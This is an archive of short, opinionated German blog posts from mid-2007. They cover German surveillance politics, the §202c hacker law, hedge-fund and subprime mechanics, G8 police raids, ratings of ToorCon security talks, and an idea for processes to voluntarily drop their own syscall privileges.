[l] Ach. Nvidias Grafiktreiber supporten die alte Hardware doch noch, das ist nur aus der INF-Datei entfernt worden. Eine Site in Israel hat die Teile wieder reingetan, und schwupps tun die neuen Treiber auch auf den alten Karten. Das hat Nvidia offenbar nur rausgemacht, damit sich die Leute neue Hardware kaufen. Und weil das peinlich ist, will Nvidia die Site jetzt mit Anwälten aus dem Internet drohen. Bin ja mal gespannt, welches US-Gericht sie da anrufen werden, das sich für Israel für zuständig hält. Denn in Israel ist das offenbar legal.
[l] Öl-Update: "Öl wird knapp, bei Gas ist es noch schlimmer". Und nachdem der Kreml es vorgemacht hat, sichert sich auch Kanada jetzt ihren Teil des arktischen Ölkuchens. Die USA hingegen finden, daß die Ölvorkommen in internationalen Gewässen und damit für alle offen seien. Tja, Kanada, schnell noch mal in eine fette Armee investieren, sonst bringen die Amis auch euch die Demokratie.

Mon Jul 9 2007

[l] Umweltministerium entscheidet, daß das AKW Krümmel erstmal nicht ans Netz geht, Landesministerin droht offen mit Entzug der Betriebserlaubnis. Und bei Brunsbüttel bildet sich zunehmend Wasserstoff in den Rohren, das hat 2001 schon mal zu einer Wasserstoffexplosion geführt. Vattenfall ist inzwischen so unter Druck, daß sie ihre Formulare ins Internet gestellt haben. Jemand hat mir gestern die URLs zugemailt, aber heute kommt da überall nur 404. Immerhin hätten die PDFs wohl gezeigt, daß sie die Vorfälle fristgemäß gemeldet haben. Weil die Vorfälle als "Normal" eingestuft waren, hatten sie auch jeweils 5 Tage Zeit für die Meldung, das sind die Regeln.

Sat Jul 7 2007

[l] Die aktuellen Entgleisungen von Schäubels werfen die Frage auf, ob wir da jetzt nicht mal ein bißchen Aktionismus machen sollten. Ich habe gerade die Bundestagsabgeordneten für meinen Wahlkreis angeschrieben und um einen Gesprächstermin gebeten. Aber vielleicht muss man da plastischer werden.
Ich hatte vorhin die Idee, mal ein Scoreboard zu machen. Links was die Nazis gemacht haben. Mittig was die NPD vorschlägt. Rechts was der Schäuble vorschlägt. Ideen? Ich würde das gerne möglichst konkret aber auch möglichst fair haben, also nicht die Punkte so filtern, daß das möglichst meinen Punkt rüber bringt, sondern so, daß sich das ein Politologe anguckt und sagt "ja, ist OK". Oder man könnte eine Nazi-Zeitlinie machen, und dann quasi anhand der Schäuble-Vorschläge berechnen, daß wir jetzt virtuell im Jahre 1936 sind. Was haltet ihr von der Idee? Wer ist historisch bewandert und möchte mitmachen? Politologen und Historiker vor!
Oh, übrigens: Hier findet ihr eure Abgeordneten. Wenn ihr da hingeht, bereitet euch aber bitte etwas vor.

Fri Jul 6 2007

[l] Auch der CCC hat eine kleine Aktion zum §202c gemacht :-)
[l] Tja, 202c wurde durchgewunken, so langsam müssen wir die Abgeordneten wohl als Gegner und nicht mehr als Volksvertreter oder gar Partner betrachten. Meine Kumpels von Phenoelit haben ihre Webseite schon mal 202c-konform gemacht. Herzlichen Glückwunsch, liebe Regierenden, ihr habt erfolgreich unsere Zukunftschancen außer Landes getrieben.

Mon Jul 2 2007

[l] Aufruf für aufsteigende Dot-Com-Millionäre: hier ist mal ein Projekt, das gerade akut Kohle braucht, und das es sich zu fördern lohnt: die C-Base. Wer nach dem Congress mal auf der After-Party war, oder auf dem congress in der art&beauty Ecke oder auf dem Camp an den diversen coolen Sachen, die die da gemacht haben, der kennt sie schon. Die anderen können ja mal ein bißchen auf der Webseite rumstöbern. Ansonsten machen die auch Open Stage und andere Kunst- und Nerdprojekte und sind eine wichtige Infrastruktur. Wer also gerade ein bißchen Kohle übrig hat: die C-Base ist sicher karmatechnisch eine der besseren Spendemöglichkeiten gerade.

Sun Jul 1 2007

[l] Nettes Paper über das Hedge Funds Massaker bei Bear Stearns. Der Autor betreibt BullionVault, die Gold als Investment vertreiben, insofern hat der ein Interesse daran, andere Investments schlecht aussehen zu lassen, aber das scheint schon Hand und Fuß zu haben. Inhaltlich ist da jetzt nichts massiv überraschend neues drin, aber es erklärt sehr schön, was für eine Verarschung das ganze Fonds-Geschäft ist.
Es fängt damit an, daß eine unseriöse Abzocker-Firma Leuten Hypotheken verkauft, bei denen weitgehend klar ist, daß sie sie nie zurück zahlen können werden. Dann packen diese Firmen diese Müll-Hypotheken mit 80% soliden Hypotheken zusammen und verkaufen das als Paket. Damit sind sie das Risiko los und können so lange weiter operieren, bis der Markt abgestürzt ist. Das ist genau, was gerade passiert in den USA.
Stellt sich die Frage, wer die Pakete kauft. Das Paper beschreibt drei Methoden. Die erste ist: man gründet einen Hedge Fund. Dem gibt man Kapital, sagen wir ne Milliarde, und damit kauft er Hypothekenpakete. Dann geht der Häusermarkt hoch. So lief das die letzten 20 Jahre. Daraufhin sinkt das Risiko, daß die Hypotheken alle platzen. Der Hedge Fonds erhöht damit den Papierwert der Hypotheken und leiht sich mit diesen Hypotheken als Sicherheit bei einer Bank noch eine Milliarde. Mit der kauft der dann neue Hypotheken. Ein riesiges Pyramidenschema. Das läuft solange gut, wie die Häuserpreise steigen. Die Fonds-Manager verdienen sich dankt des steigenden Papierwertes des Fonds jährlich einen fette Bonus. Alles ist gut. Die Hedge Fonds, die da gerade kaputt gegangen sind, haben das 5 und 15 Mal durchgezogen, d.h. der eine hatte auf eine Milliarde Kapital 4 Milliarden von Banken geborgt, und der andere 14 Milliarden. Den mit den 4 Milliarden haben sie jetzt "gerettet":
Clearly, there were no cash assets in the hedge funds. The banks tool hold of the CDOs — their collateral — and went to sell them. The first ouf of the door, rumoured to be Merrill Lynch, mostly got the collateral it was owed, but it exhausted the CDO market of buyers. The rest found no bigs and quickly stopped trying to sell for fear of advertising the worthlessness of something which now sits in many portfolios at investment banks and funds all over the world.
Der Hammer: die Fonds haben gar nicht in Müll-Hypotheken investiert, sondern nur in die soliden Hypotheken. Und da ist jetzt schon der Markt kaputt. Weia.
Die zweite Variante scheinen in großem Stil Altersvorsorge- und Versicherungs-Fonds zu sein. Und deren Manager haben ja nun überhaupt gar kein Interesse daran, den Wert ihrer Einlagen nach unten zu korrigieren. Daher schweigen die alle.
Die dritte Variante ist besonders übel. Da baut man eine Art Risiko-Versicherung, d.h. man behält die Hypothekenverträge und kassiert bei denen, die zahlen, aber das Risiko übernimmt jemand anderes, und den bezahlt man dafür wie mit einer Versicherungsprämie. Für denjenigen ist das toll, solange die Verträge nicht platzen, weil er Geld kriegt, ohne dafür etwas investieren zu müssen. Daher haben das wohl viele Fondsmanager gemacht, wenn ihr Fonds mal in einem Quartal nicht so toll performt hat.
Aber der absolute Hammer: jemand hat gemerkt, daß man diesen Versicherungs-ähnlichen Deal auch abschließen kann, ohne tatsächlich eine Hypothek zu halten. Das sind dann also Spekulanten, die quasi eine Schuldverschreibung sehen, die kränklich aussieht, und auf die eine Versicherung abschließen. Er hat sogar ein praktisches Beispiel. Als Delphi (die hier) mit ihren Bonds Konkurs anmeldeten, gab es dann bei den Underwritern Faktor 10 (!!) des Nominalwertes der Bonds als Versicherungsforderung. Wow. Das ist als wenn man auf der Straße einen kränkelnden alten Mann sieht, und dann auf den eine Risikolebensversicherung abschließt. Unglaublich.
Diesen Versicherungs-Markt muss man sich wie ein Derivat vorstellen, das hat genau wie Optionsscheine bei Aktien einen starken Hebel, so daß es da immenses Interesse und Wachstum gab. Der Großteil der Nachfrage kam von Pensionsfonds, weil die nach dem Dot-Com Bust plötzlich aus Aktien wenig Gewinn extrahieren konnten, aber regelmäßige Zahlungen rausgehen haben, und daher unter großem Druck waren, neue Investmentarten zu finden, ruhig auch spekulative, Hauptsache es kommt kurzfristig Kohle rein.
Interessantes Detail am Rande: diesen Versicherungs-Sachen und dem Risiko kann man sehr schwer einen Wert zuweisen, und der Markt ist unreguliert, daher taucht das nicht in der Buchführung auf. Niemand kann sagen, wer da in welcher Höhe investiert hat.

Fri Jun 29 2007

[l] Der Bürgermeister von São Paulo hat Werbung verboten. Keine Poster, keine Billboards, keine Werbung auf Bussen oder Bahnen, nichts. Wow. Hier hat jemand Fotos der Überreste gemacht. Das ist ja so eine Sache, wo ich mich schon lange gefragt habe, wie das wohl aussehen würde, wenn man das mal machen würde.

Wed Jun 27 2007

[l] Toller neuer Reformvorschlag der SPD, und die CDU ist dafür. Damit ist klar: das muss furchtbar sein. Das Schlagwort ist "Deutschlandfonds", denn dümmer geht immer.
Inhaltlich ist die Idee, daß Arbeitgeber einen Teil des Gehaltes nicht an den Angestellten auszahlen, sondern in einen Fonds einzahlen. Der Staat schießt Geld zu, um den Arbeitgebern die Sache schmackhaft zu machen (?!?). Und damit der Bürger nicht merkt, was für eine Verarschung das ist, doktert man an den Definitionen herum:
In den Fonds sollen nach den Vorstellungen der SPD keine Gehaltsbestandteile fließen, sondern Bonus- oder Extrazahlungen der Firmen.
Aha. Soso. Bonus-Zahlungen. Die sonst an die Arbeitnehmer gegangen wären. Ich nenne das mal beim Namen: Gehalt. Genau so eine unseriöse Augenwischerei wie das Wortgeklaube beim Arbeitgeberanteil. Das ist natürlich auch Teil des Gehaltes, auch wenn man es anders nennt, damit der Prozentsatz der Abgaben am Gehalt nicht so groß aussieht.
Nun, wozu das ganze? Weil die Wirtschaftsexperten der SPD sich vorstellen, daß Fonds grundsätzlich Gewinn machen. Man läßt das professionell managen, und dann bringt das immer Gewinn. Da hat offensichtlich jemand Volkswirtschaft nicht verstanden, denn Fonds drucken kein Geld neu. Die machen Gewinn, indem sie anderen das Geld wegnehmen. Üblicherweise läuft das über einen stabilen Anteil von Staatsanleihen plus einen Anteil an spekulativeren Investments, wie Aktien oder Risikokapital. Selbstverständlich haben auch schon Fonds Verlust gemacht, aber das hat offensichtlich bei der SPD noch keiner gehört. Und Staatsanleihen sind ja auch so eine Volksverarschung, wo der Staat darauf spekuliert, daß er das Geld schnell genug entwertet kriegt, daß am Ende die Zinsen von der Inflation aufgefressen werden. Wie garantieren sie, daß das jemand macht, der weiß, was er tut?
"Wir wollen ihn ausschreiben", sagte der SPD-Vorsitzende. "Das könnten private Banken machen, aber auch die Kreditanstalt für Wiederaufbau."
Aha, soso, die Kreditanstalt für Wiederaufbau, die ja im profitablen Geldanlegen keine Erfahrung haben. Und Ausschreiben, das heißt ja, daß der Billigste genommen wird. Ganz klar, ein Garant für Qualität und Kompetenz.
Aber gucken wir mal aus einem anderen Winkel darauf. Was schlägt der Beck denn da vor?
Die Beteiligung am Fonds könne Teil von Tarifverträgen sein.
D.h. die Gewerkschaften sollen das verhandeln. Schuld ist das Fondsmanagement — das hilft den Opfern dann auch nichts. Die Arbeitgeber sollen da einzahlen, aber sollen bitte den Arbeitnehmern vorlügen, es sei "Bonus" und kein Teil des Gehaltes. Der Staat will dazu buttern, aber kriegt die Kohle ja über die Quellensteuer zurück, und vermutlich werden auch Steuern auf die Auszahlungen fällig. Am Ende hat da genau einer was von, nämlich derjenige, der die Ausschreibung gewinnt. Der kann wunderbar Insider-Geschäfte und Kickback-Deals machen, mit Geld, das garantiert reinkommt, weil es in den Tarifverträgen drin steht.
Das Gefasel mit dem "insolvenzsicher" ist natürlich auch Unfug, denn wenn man das Gehalt direkt auszahlt, ist das Geld beim Arbeitnehmer und bleibt auch nach einer Insolvenz dort. Im Übrigen sind auch im Moment übliche Altersvorsorge-Modelle insolvenzsicher (mal von Ausnahmen wie konzerninternen schattigen Deals bei Monsterkonzernen abgesehen). Meiner Ansicht nach ist der einzige Hintergedanke hier, daß der Beck simulieren kann, er habe sich Gedanken gemacht. Schade nur, daß das wieder mal so eine Lachnummer geworden ist. Wobei, merken wird das eh keiner. Wer hat schon Lust, sich Becks Geseier mal genauer anzugucken, der hat ja eh nichts zu sagen (Gott sei Dank). Und sie haben sich die Hintertür aufgehalten, daß sie ja keinerlei Umsetzungsdetails oder gar Zahlen genannt haben, damit sie bei Kritik immer sagen können, SO sei das ja gerade NICHT gemeint gewesen.

Wed Jun 20 2007

[l] Im Internet würd man für jeden Fliegenschiß abgemahnt und anderweitig juristisch verfolgt, aber sich selbst geben die Herren Immunität, damit sie keiner anklagen kann, wenn sie mal wieder verbal in Klo greifen. Aktuelles Beispiel: Pofalla vergleicht die Linken mit der NPD. Pofalla, … da war doch was … ah DER Pofalla. Na der ist ja wohl ganz klar bei der richtigen Partei.
[l] Hurra, der Aufschwung hat uns alle reich gemacht!1!!
Und bei aller Freude über diesen Bericht möchte ich darauf hinweisen, daß wir eine stetige Inflation in die Gegenrichtung haben. Wir haben zwar mehr Geld, aber es ist weniger wert. Die selbe Zinsenszins-Formel betrifft auch die stetige Entwertung des Geldes (und die brauchen wir, sonst würden ja die Staatsschulden noch stärker wachsen). (Danke, Elias)

Tue Jun 19 2007

[l] Bei manchen Politikern muss man sich echt fragen, was eigentlich passieren muss, damit die mal einsehen, daß sie im Unrecht sind. Aktuelles Beispiel: Der Steinmeier (es geht um die EU-Verfassung):
Bundesaußenminister Frank-Walter Steinmeier hatte gestern Abend zum Auftakt der Beratungen in Luxemburg betont, die Befürworter seien zwar bereit, auf den umstrittenen Titel "Verfassung" zu verzichten, wollten aber "wichtige Errungenschaften" des Textes erhalten.
Nee, klar, eine vernichtende Wahlniederlage reicht nicht. Was muss da eigentlich passieren? Ein Attentatsversuch? Aber Moment, da kommt noch ein großartiges Highlight:
Der Verfassungsentwurf sieht vor, dass Beschlüsse im Rat der EU-Regierungen künftig mit einer Mehrheit von 55 Prozent der Mitgliedstaaten gefällt werden, die zugleich mindestens 65 Prozent der EU-Bevölkerung repräsentieren müssen. Die polnische Regierung fordert stattdessen eine Formel, die Polen mehr Gewicht gegenüber bevölkerungsreichen Staaten wie Deutschland verleihen würde.
HAHAHAHA, die Polen sind echt Knalltüten vor dem Herrn. ~~Liebe Polen, wir mögen euch nicht~~. Wir haben euch in die EU gelassen, und ihr tretet uns sei dem bei jeder Gelegenheit mit den Füßen. Wenn es nach mir ginge, würdet ihr wieder rausfliegen aus der EU. Wir können gerne neu verhandeln, wenn ihr eure beiden Brachial-Politclowns da abgesägt habt. Geht ja gar nicht. Und jetzt sind die Polen auch noch sauer, daß niemand auf ihren lächerlichen "Vorschlag" reagiert hat. Mann Mann Mann. Na aber na klar sollte Polen mehr Stimmen kriegen als andere, wegen der tollen Errungenschaften für die EU, die sie gemacht haben, man denke da an das Gammelfleisch an Russland (was ja offenbar mehr als ein Hirngespinst war), oder die Raketenabwehrsache, die die ganze EU diskreditiert hat. Da habt ihr euch eine Gehaltserhöhung echt verdient, liebe Polen. Bwahaha
Update: Das klang so, als würde ich die Polen (die Einwohner des Landes) nicht mögen, aber die können ähnlich wenig für ihre Schrott-Regierung wie die Amis für den Bush können.
Update 2: Oh und die Polen waren es auch, die den Amis erlaubt haben, auf ihrem Grund und Boden Folterknäste aufzubauen. Das wird Jahrzehnte brauchen, bis sie diese Scharte wieder ausgewetzt haben.

Mon Jun 11 2007

[l] Ich hatte vor ner Woche oder so mal den Bundesrats-Ermächtigungsgesetz-Entwurf gelesen, und dazu mal ein paar Notizen gemacht. Das ist ein bißchen unfreundlich zu lesen, weil die sich da über 50 Seiten oder so über einen Bundestags-Entwurf unterhalten, der selber fast 200 Seiten lang ist, und den man dann als Kontext braucht, aber was tut man nicht alles für die Demokratie und den Rechtsstaat. Eigentlich wollte der CCC dazu ne Presseerklärung machen, aber das ist im Sande verlaufen, nachdem da jetzt die Sache mit den Wahlcomputern dazwischen kam.
[l] Die Einreise verlief ohne Analproben, eine Geruchsprobe hätten sie mir aber prima beim Abtasten unbemerkt abnehmen können, weil ich vom Zufallsgenerator ausgewählt wurde, daß der Metalldetektor bei mir piept. Und jetzt kriege ich gerade einen Anruf, daß im Büro ein Einschreiben mit Rückschein vom BKA auf mich wartet. Hach, toll. So stellt man sich eine zünftige Begrüßung von seiner Heimat vor…
Immerhin, wenn sie was wirklich übles von mir wollten, hätten sie kein Einschreiben sondern einen Mannschaftswagen geschickt, denke ich mir mal.
Update: Also das war eine Abmahnung des BKA, wo sie schreiben, sie hätten das Urheberrecht an den Verdachtskriterien islamistischer Terrorismus, und ich solle das mal aus dem Internet löschen. Nach anderthalb Jahren. Außerdem wollen sie eine strafbewehrte Unterlassungserklärung von mir haben, da werde ich wohl jetzt mal einen Anwalt konsultieren müssen. Ich habe das mal weggemacht, weise aber auf die alte Weisheit hin:
Trying to remove documents from the internet is like trying to fish pee out of a pool.
Ich überlege gerade, ob ich darauf mit einer Anfrage nach dem Informationsfreiheitsgesetz antworten soll. Das kostet wohl so 50 Euro oder so, ich könnte ja hier Spenden sammeln. Wenn ihr findet, daß das gemacht werden sollte, könnt ihr mir ja mal ne Mail schreiben :-)

Fri Jun 1 2007

[l] Rücknahme der G8-Presse-Akkreditierung von Gericht rückgängig gemacht, und mit einer fetten Ohrfeige fürs Bundespresseamt noch dazu.

Tue May 29 2007

[l] Die BBC hat eine sehenswerte Dokumentation über den Kult Scientology gemacht, die es bis auf Youtube gebracht hat: Teil 1, Teil 2, Teil 3, Teil 4. Ich hoffe, daß davon noch mal eine anständige High-Res Version in einem Stück irgendwo auftaucht, weil hier der Sound ein bißchen daneben ist.
Hier ist noch eine lustige französische Dokumentation (ins Englische übersetzt).
Update: Hier gibt es eine High Res Version als DivX

Mon May 28 2007

[l] Meine Fresse, die Hamburger Polizei hat mal ganz deutlich gemacht, wie wichtig uns die Versammlungsfreiheit ist. Hier sind ein paar Bilder aus einer NDR-Fotostrecke:
1. Polizei kesselt Demonstranten ein
2. hier nochmal das Kräfteverhältnis
3. "Ein Polizist mit gezogener Waffe wird mit Farbbeuteln beworfen.". Ja, richtig gelesen, mit gezogener Waffe. Unglaublich.
Update: Hier gibt es mehr Bilder, u.a. dieser Instant-Favorit hier (Danke, Timo)

Thu May 24 2007

[l] Polizei filzt systematisch Post von G-8-Kritikern. Gibt es eigentlich noch Dinge, die die Stasi gemacht hat, die wir gerade nicht machen?

Wed May 23 2007

[l] Auch im Gesundheitsministerium hat man es nicht mehr nötig, das Volk zu belügen. Die lügen nicht mal mehr herum, daß die Gesundheitskarte gut fürs Volk oder für irgendwas sei, nein, sie sagen, die Gesundheitskarte sei ein "Verkaufsschlager". Das ist das einzige Argument, das die noch haben! Und angesichts so einer katastrophalen Totalniederlage wird das nicht eingestampft, sondern natürlich weiter gemacht. Stay The Course. Kenn ich irgendwo her.

Tue May 22 2007

[l] Falls das hier einer der Terroristen 2.0 liest: auf euch wartet der Schäuble nur. Ihr seid genau was der braucht, um seine Terrorgesetze zu begründen. Auf euch wird er zeigen, während er unsere Justiz zerlegt, unsere Exekutive stärkt, und unsere Grundrechte abschafft. Protestieren ist gut, aber gewaltlos. Die Presse ist ausnahmsweise mal auf unserer Seite und berichtet auch über unsere Demonstrationen.
Schäuble wird Störer schicken, Undercover-Polizisten, die dann randalieren, um euch zu diskreditieren. Das haben noch alle fiesen Unterdrückungsstaaten so gemacht, um ihre Polizei-Gewaltexzesse zu begründen. Will sagen: es wird auch ohne eure explizite Gewaltausübung von eurer Seite hart genug, nicht wie totale Arschlöcher auszusehen. Wir Deutschen haben das schon mal geschafft mit friedlichen Montagsdemos. Wir schaffen das auch nochmal.
PS: Wenn das jetzt gerade so aussieht, als kriegt ihr auffallend wenig Gegenwind, liegt das daran, daß der Schäuble wartet, bis das Volk mehr Angst vor euch hat.

Fri May 18 2007

[l] Update zu der Idee gestern. Mir haben Leute gemailt, ich soll doch SELinux nehmen, oder Capabilities. Das ist eine andere Schicht. SELinux heißt, daß der Admin sagen kann, dieser Prozeß darf nur $FOO. Das ist gut und schön, aber der Admin weiß üblicherweise nicht genau, was ein Prozeß können darf oder nicht. Daher wird der Admin im Zweifelsfall zu wenig weg nehmen. Ich will, daß ein Prozeß dem entgegen kommen kann, indem er von sich aus auf Rechte verzichtet, die er normalerweise hat. Das soll dann zusätzlich zu den Admin-Einschränkungen auch noch gelten. Ich mach mal ein Beispiel. Ich will in meinem smtpd z.B. sowas sagen können:
```
  kill_me_if_I_do(ACT_FORK|ACT_CLONE|ACT_PTRACE|ACT_KILL|ACT_EXECVE|
                  ACT_SOCKET|ACT_MKNOD|ACT_MOUNT);
```
Der wichtige Teil ist, daß dieser Prozeß nicht privilegiert ist, der läuft nicht als root, der läuft als User "smtpd". Selbst wenn der das nicht macht, darf der eh nur ptrace auf andere Prozesse machen, die als smtpd laufen. Ich will diesem Prozeß keinesfalls die Möglichkeit geben, in der System-Policy-Datenbank herum zu schreiben. Aber der soll für sich selbst freiwillig (und nicht rückgängig machbar) sagen können: wenn ich fork oder execve aufrufe, erschieß mich.

Thu May 17 2007

[l] Die Bush-Junta ist offenbar bereits so abgewirtschaftet, daß da jetzt schon Insider die peinlichen Details preisgeben: Wie Ashcroft das illegale Abhörprogramm Bushs ~~verhindert~~ besser gemacht hat. Tja, danach waren immer alle im Widerstand, kennen wir Europäer ja aus nächster Nähe, das Phänomen.

Tue May 15 2007

[l] Die Association of Muslim Scholars in Iraq behauptet, die Bombenanschläge im Irak würden von dem Söldnern im Dienste der Amis gemacht, um das Volk zum Bürgerkrieg aufzustacheln. Nicht unbedingt eine unabhängige Quelle, aber es mehren sich die Stimmen, die das so oder so ähnlich sagen.

Mon May 14 2007

[l] Kurzes Rating der Toorcon-Vorträge:
1. Beetle, WiFight Club — hab ich verpaßt, weil ich den Club irgendwie nicht gefunden habe, wo das stattfand.
2. Brad Hill, Sanity & Best Practices with WS-Security & Federated Identity — prima Talk, Brad Hill ist überhaupt hervorragend.
3. Pusscat, Automating Exploitation — ich hatte Befürchtungen, aber der Talk war gut; sie macht da ein Windbg-Plugin, um den Schritt zwischen Fuzzing und Exploit zu automatisieren. Man teilt dem Plugin mit, wo die Buffer sind, die man da overflowt, und der verfolgt dann den Heap und sagt einem, welcher String das war (und sogar ob der unterwegs tolower() oder ne Unicode-Konvertierung durchlaufen hat).
4. Rodney Thayer, Plastic Money — der Typ kam so ein bißchen nervig rüber am Anfang, aber hat dann doch überzeugt. War ein Vortrag über Kreditkarten-Sicherheit, eher so auf Management-Ebene, was da alles verkackt wird, wie in den USA die Kreditkartenfirmen anständige Security enforcen (offenbar eher wenig). Thumbs up.
5. Dan Griffin, Hacking Windows Vista Security — war nichts. Der hat da für irgendwelche neuen APIs Code geschrieben, um die zu demonstrieren.
6. Matt Peterson, Tits & Bits - The inside scoop of pr0n 2.0 content delivery — das war ein cooler Talk. Der hat da einmal das Geschäftsmodell von Porno-Hostern beleuchtet, und ein paar Trade Mags rumgereicht (ich erinnere mich an einen Artikel mit einer dicken Zitat-Zeile "When we needed Bukkake, we went to $XY and never looked back"), und erzählt, wie Level 3 darauf bestand, alle ihre angebotenen Seiten vor der Vertragsunterzeichnung zu prüfen (yeah right), und dann hat er eine Email seiner zuständigen Dell-Salesperson gezeigt, wo sie ihm irgendein two-for-one Angebot unterbreitet, und als PS meint, ihr und ihrem Ehemann hätten ihre Webseiten ja ganz großartig gefallen :-)
7. Adam Shostack, Security breaches are good for you, like a root canal — fand ich eher belanglos. Er hat erzählt, daß Disclosure von erfolgreichen Hackangriffen so gut wie nie dazu führt, daß den Firmen dann die Kunden weglaufen oder die Aktienkurse abstürzen.
8. Quinn Norton, Body Hacking - Functional Body Modification — hat genau das selbe erzählt, was sie auch auf dem Congress erzählt hat. Ich finde sowas ja immer eher nicht so groß, wenn Leute den selben Vortrag auf n Veranstaltungen bringen, aber mehr hat sie offenbar nicht.
9. RSnake, Master Recon-Tool (Mr. T) — boah war das schlecht. Fing damit an, da mit Javascript irgendwelche "Details" über Webbrowser abzufragen, von denen wir alle wissen, daß man sie abfragen kann, und griff dann voll ins Klo mit der Ansage, daß er ja demnächst einen Sniffer und ein nmap ohne OS-Detection (aber sonst mit allem) in Javascript hacken würde, aber bisher noch nicht die Zeit hatte.
10. Katie Moussouris, Vulnerability Disclosure Panel Remix — "Was denkt ihr denn so alle über Disclosure?" Nicht erwähnenswert.
11. Toby Kohlenberg, A taxonomy & tool for automated vulnerability chaining and path discovery — Oh Mein Gott war das schlecht.
12. dr.raid & Postmodern, Social networking sites: covert channels for Botnets — ich bin mir nicht sicher, ob der Talk eine Verarschung war oder nicht. Sie haben da offenbar auf myspace HTML-Kommentare mit PGP-signierten Nachrichten gefunden und halten das für einen Kontrollkanal für Botnetze. Kommandos beginnen offenbar mit "OMG LOL" :-) Highlight: sie haben eine Proof-of-Concept Implementation namens libOMG gehackt, und da Beispiel-Code gezeigt, der einen HTML-Kommentar extrahierte und dann damit … system() aufrief! Jemand fragte dann nach, ob sie das wirklich so meinen, der Vortragende merkte erst mal gar nicht, worauf der Fragende hinaus wollte, und war dann eher peinlich berührt :-)
13. I)ruid, DisAsterisk — ein Fuzzing-Plugin für Asterisk. War eher peinlich, wie er da beschrieb, wie man auf der Commandline der Fuzzer an- und wieder ausschaltet. Äh, ja, das haben wir uns gedacht, daß das dann irgendwie geht. Ich bin ja eh eher nicht so überzeugt von Fuzzing. Das mit Scheiße werfen lasse ich lieber die Affen im Zoo machen.
14. Dan Kaminsky, Further Adventures In Visual Data Exploration — Dan hat die alten TCP-Sequenznummer-Visualisierung von Michal Zalewski mit OpenGL echtzeitfähig gemacht, war ein typischer Kaminsky-Talk, sehr lebhaft :-)
15. David Maynor & Robert Graham, Ferret and the continuing adventures of Data Seepage: Web 2.0 — GANZ ganz schlecht. "Man kann sniffen, und dann sieht man iTunes-Announcements von Apple-Deppen und AIM-Buddy-Listen von den ganzen AIM-Deppen"
16. Richard Johnson, Memory Manager Attack and Defense — nicht überzeugend. Auf Eusecwest hat der Typ auch nen Vortrag gehalten, der deutlich cooler war. Dieses Mal hat es irgendwie nur zu Platitüden gereicht und der Einsicht aus den 90ies, daß man Heap-Overflows angreifen kann.
Von den Lightning Talks hat am meisten der von Chris Abad gerockt, Web 4.0 — ein wunderbarer Rant. Der Mann sortiert als Beruf Spam bei Cloudscape, und offenbar hat er einen Spam zu viel lesen müssen, jedenfalls rantete der da, daß die Schwarte nur so krachte. Auf Youtube gibt es Videos, in denen Leute auf Videos antworten, in denen andere auf Videos von anderen antworten, die Videos zeigen, in denen jemand ein Video macht. "Und diese Leute beschützt ihr!" rief er :-) "Greift nicht die Computer an, greift die Leute an!" Web 4.0 ist ein Internet ohne Idioten, so seine Vision. Amen.

Thu May 10 2007

[l] Mir haben zwei Leute gemailt, daß die Staatsschutzdelikte (z.B. alles, was unter § 129a fällt), nicht in die normale Kriminalitätsstatistik (PKS) kommen, sondern in die PKS-S, eine geheime Zusatzstatistik. So kann keiner sehen, wie häufig sie das anwenden, und was für eine Aufklärungsquote sie haben. Hier ist der Wikipedia-Eintrag dazu.

Wed May 9 2007

[l] Die Fieberträume der IFPI sind doch immer für einen Lacher gut: Wer in Deutschland Bittorrent benutzt, um Copyright-geschützte Daten zu saugen, dem soll gleich der Internet-Zugang zugemacht werden, wünscht sich die IFPI bei "Krisengesprächen" mit der Merkel. Und das traurige ist: so unfähig, wie die Merkel ist, hat das reelle Chancen.
[l] Wer sich schon immer mal gefragt hat, wie die Stasi 2.0 ihre Terrordatenbanken befüllen will, für den habe ich jetzt eine Antwort: Unter dem Vorwand von § 129a (gründung einer terroristischen Vereinigung) haben sie bundesweit Razzien bei G8-Gegnern gemacht. Indymedia hat auch was dazu. Ich muss glaube ich nicht erwähnen, daß sie da vermutlich nicht mal einen Gewalttäter durchsucht haben. Die drei Details, die ich da kenne, sehen eher nach "Staatsfeinde einschüchtern" aus. Tolles Land, in dem wir da wohnen. Im Übrigen, guckt euch mal an, was § 129a für Anforderungen stellt. Das will ich sehen, wie sie das auch nur bei einem einzigen Durchsuchten belegen können. Ich glaube ja eher, daß sie da ein paar Joints zu finden hoffen, und die Leute dann wegen Drogendelikten und Steuerhinterziehung drankriegen wollen.
Pressemitteilung des Generalbundeswanwaltes
Aus dem Spiegel-Artikel:
Daneben gehen die Fahnder einem weiteren Anfangsverdacht nach, demzufolge sich in Hamburg und anderen Bundesländern eine terroristische Vereinigung gebildet hat, die womöglich sogar Anschläge zur Verhinderung des Gipfels planen könnte.
Boah, SO VIEL Beweislast habt ihr schon angehäuft? Eventuell könnte möglicherweise potentiell jemand daran gedacht haben, eines Tages vielleicht Anschläge planen zu können? Meine Güte, das ist natürlich was anderes, gleich alle einbuchten!1!!

Sun May 6 2007

[l] Die Rasterfahndung haben wir in Deutschland zwei Mal gemacht, und beide Male war es ein komplettes Debakel, ein Reinfall von geradezu biblischen Ausmaßen. Klar also, daß der Schäuble dem BKA bundesweite Rasterfahndungs-Erlaubnis geben will.

Thu May 3 2007

[l] War ja klar, daß die Amis anläßlich des Uni-Massakers jetzt voll durchknallen würden: Chinesischer Schüler auf Sonderschule geschickt, weil er eine Counterstrike-Map der Schule gemacht hat. Sie haben dann sein Heim durchsucht, und in seinem Zimmer einen Hammer gefunden, mit dem er immer das Bett repariert hat, weil das halt rottig war, und den Hammer hat die Polizei dann natürlich sofort als potentielle Waffe beschlagnahmt.
"They decided he was a terroristic threat," said one source close to the district's investigation."
Nee, klar. (Danke, Klaus)

Wed May 2 2007

[l] Der Bundestrojaner-Einsatz funktioniert wohl nicht so überzeugend bisher.
